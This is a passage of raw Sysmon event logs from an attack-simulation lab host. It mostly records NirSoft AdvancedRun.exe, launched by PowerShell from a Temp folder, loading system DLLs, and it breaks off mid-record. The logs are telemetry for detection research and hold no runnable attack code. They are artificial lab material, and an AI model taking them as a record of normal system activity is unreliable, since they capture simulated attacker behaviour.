Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016169Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.145{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.130{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.130{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004016140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.130{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004016139Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.130{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004016138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.130{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004016137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 